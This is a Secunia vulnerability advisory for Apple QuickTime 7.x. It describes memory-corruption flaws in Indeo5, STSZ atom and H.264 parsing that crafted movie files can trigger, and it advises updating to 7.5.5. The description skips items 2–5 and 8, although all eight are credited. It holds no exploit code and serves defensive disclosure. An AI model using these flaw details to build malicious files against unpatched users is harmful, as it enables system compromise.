http://www.zerodayinitiative.com/advisories/disclosure_policy/

TITLE: Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31821
VERIFY ADVISORY: http://secunia.com/advisories/31821/
CRITICAL: Highly critical
IMPACT: System access
WHERE: From remote
SOFTWARE: Apple QuickTime 7.x
http://secunia.com/advisories/product/5090/

DESCRIPTION:
Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system.
1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file.
6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing an overly large entry in sample_size_table.
7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

SOLUTION:
Update to version 7.5.5.
QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html
QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html
QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Paul Byrne, NGSSoftware.
2) Reported by an anonymous person via ZDI.
3) The vendor credits Roee Hay, IBM Rational Application Security Research Group.
4) Reported by an anonymous person via ZDI.
5) Reported by an anonymous person via iDefense VCP.
6) Reported by an anonymous person via ZDI.
7) Reported by an anonymous person and Subreption via ZDI.
8) The vendor credits David Wharton.

ORIGINAL ADVISORY:
Apple: http://support.apple.com/kb/HT3027
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-08-057/
http://www.zerodayinitiative.com/advisories/ZDI-08-058/
http://www.zerodayinitiative.com/advisories/ZDI-08-059/
http://www.zerodayinitiative.com/advisories/ZDI-08-060/
http://www.zerodayinitiative.com/advisories/ZDI-08-061/
http://www.zerodayinitiative.com/advisories/ZDI-08-062/
iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744

About: This Advisory was delivered by Secunia as a free service to help everybody keep their systems up to date against the latest vulnerabilities.
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.